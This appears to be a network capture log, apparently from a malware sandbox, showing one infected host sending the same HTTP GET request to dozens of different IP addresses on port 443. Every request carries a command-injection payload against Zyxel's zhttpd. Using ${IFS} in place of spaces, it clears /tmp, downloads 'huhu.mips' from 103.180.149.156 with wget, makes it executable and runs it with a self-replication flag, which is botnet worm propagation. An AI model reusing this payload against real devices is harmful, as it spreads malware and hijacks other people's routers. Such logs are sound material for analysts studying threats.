                                                      Feb 2, 2024 06:36:14.081937075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9570192.168.2.1458650110.70.131.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.081980944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9571192.168.2.1446672194.103.91.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082010031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9572192.168.2.144351674.64.160.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082065105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9573192.168.2.1453660183.6.93.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082113028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9574192.168.2.1438286120.39.187.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082155943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9575192.168.2.145972461.224.12.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082211971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9576192.168.2.1453908101.63.205.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082253933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9577192.168.2.1434750118.35.244.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082292080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9578192.168.2.1443430222.104.75.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082349062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9579192.168.2.145096083.15.132.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082396984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9580192.168.2.144302042.110.145.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082437038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9581192.168.2.1454258206.148.68.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082470894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9582192.168.2.1447378211.230.243.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082504988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9583192.168.2.143313070.168.151.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082562923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9584192.168.2.143971235.106.245.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082606077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9585192.168.2.14380328.148.156.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082659006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9586192.168.2.1436674108.117.243.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082686901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9587192.168.2.1459570170.92.125.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082758904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9588192.168.2.1445472106.174.169.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082791090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9589192.168.2.145114420.49.142.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082844973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9590192.168.2.143733248.39.190.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082890034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9591192.168.2.144351686.251.186.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082927942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9592192.168.2.144371668.162.186.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.082962036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9593192.168.2.1441142131.74.92.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083003044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9594192.168.2.1441086201.159.200.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083029032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9595192.168.2.1441696221.217.255.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083067894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9596192.168.2.145654414.38.108.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083098888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9597192.168.2.144347672.235.153.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083153963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9598192.168.2.1457542158.217.195.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083201885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9599192.168.2.1442414136.74.211.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083241940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9600192.168.2.144763290.155.115.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083293915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9601192.168.2.145252661.112.184.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083336115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9602192.168.2.1447450141.9.246.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083364964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9603192.168.2.1439718189.122.242.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083400011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9604192.168.2.1451296100.43.172.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083451986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9605192.168.2.145772248.216.96.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083482981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9606192.168.2.1458074221.48.208.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083508015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9607192.168.2.1457814164.254.213.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083537102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9608192.168.2.1449530133.232.98.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083604097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9609192.168.2.1455260107.55.249.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083620071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9610192.168.2.1446720223.59.225.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083684921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9611192.168.2.143874881.117.248.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083730936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9612192.168.2.14492661.146.143.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083771944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9613192.168.2.145422487.7.196.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083811998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9614192.168.2.143662494.203.138.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083854914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9615192.168.2.1442000134.253.138.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083894968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9616192.168.2.144480298.124.153.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083942890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9617192.168.2.1444324185.54.120.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.083980083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9618192.168.2.1447368181.188.163.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084027052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9619192.168.2.1455226143.158.9.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084059954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9620192.168.2.1458384135.4.63.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084100008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9621192.168.2.1438354106.233.95.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084142923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9622192.168.2.1439114132.179.249.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084181070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9623192.168.2.1448054120.19.21.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084207058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9624192.168.2.1452266179.205.58.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084238052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9625192.168.2.144414276.12.75.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084274054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9626192.168.2.144381232.173.134.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084306955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9627192.168.2.1451852200.121.70.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084358931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9628192.168.2.145570265.14.134.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084376097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9629192.168.2.145789259.92.189.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084440947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9630192.168.2.144040899.61.84.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084476948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9631192.168.2.143923259.240.80.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084513903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9632192.168.2.1457396197.55.114.209443
                                                      TimestampBytes transferredDirectionData
